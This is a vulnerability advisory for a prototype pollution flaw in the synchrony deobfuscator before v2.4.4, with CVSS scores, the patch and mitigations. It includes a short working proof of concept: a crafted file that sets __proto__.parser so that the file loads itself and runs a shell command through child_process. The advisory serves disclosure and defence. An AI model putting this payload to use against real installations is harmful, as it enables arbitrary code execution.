GoogleOSV:GHSA-JG82-XH3W-RHXXSynchrony deobfuscator prototype pollution vulnerability leading to arbitrary code execution
CVSS3
Attack Vector
LOCAL
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
9.8%
Impact
A __proto__ pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation could lead to arbitrary code execution.
Summary
A __proto__ pollution vulnerability exists in the LiteralMap transformer allowing crafted input to modify properties in the Object prototype.
When executing in Node.js, due to use of the prettier module, defining a parser property on __proto__ with a path to a JS module on disk causes a require of the value which can lead to arbitrary code execution.
Patch
A fix has been released in [email protected].
Mitigation
- Upgrade synchrony to v2.4.4
- Launch node with the –disable-proto=delete or –disable-proto=throw flag
Proof of Concept
Craft a malicious input file named poc.js as follows:
// Malicious code to be run after this file is imported. Logs the result of shell command "dir" to the console.
console.log(require('child_process').execSync('dir').toString())
// Synchrony exploit PoC
{
var __proto__ = { parser: 'poc.js' }
}
Then, run synchrony poc.js from the same directory as the malicious file.
Credits
This vulnerability was found and disclosed by William Khem-Marquez.
References
Related
CVSS3
Attack Vector
LOCAL
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
9.8%